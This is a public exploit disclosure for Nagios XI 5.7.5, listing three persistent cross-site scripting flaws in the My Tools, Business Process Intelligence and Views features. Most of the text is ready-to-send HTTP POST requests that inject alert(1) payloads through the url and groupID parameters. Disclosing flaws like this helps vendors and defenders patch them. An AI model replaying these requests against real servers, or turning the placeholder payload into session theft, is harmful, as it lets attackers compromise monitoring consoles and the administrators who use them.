Nagios XI 5.7.5 Cross Site Scripting

`# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting  
# Date: 1-20-2021  
# Exploit Author: Matthew Aberegg  
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/  
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/  
# Software Link: https://www.nagios.com/downloads/nagios-xi/  
# Version: Nagios XI 5.7.5  
# Tested on: Ubuntu 18.04  
  
  
# Vulnerability Details  
# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.  
# Vulnerable Parameter : url  
  
  
# POC  
# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.  
  
POST /nagiosxi/tools/mytools.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 145  
Origin: http://TARGET  
Connection: close  
Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1  
Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas  
Upgrade-Insecure-Requests: 1  
  
nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=  
  
  
############################################################################################################  
  
# Vulnerability Details  
# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.  
# Vulnerable Parameter : groupID  
  
  
# POC  
# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.  
  
POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 186  
Origin: http://TARGET  
Connection: close  
Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add  
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td  
Upgrade-Insecure-Requests: 1  
  
groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true  
  
  
############################################################################################################  
  
# Vulnerability Details  
# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.  
# Vulnerable Parameter : url  
  
  
# POC  
# Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload.  
  
POST /nagiosxi/ajaxhelper.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 147  
Origin: http://TARGET  
Connection: close  
Referer: http://TARGET/nagiosxi/account/  
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td  
  
cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056  
  
`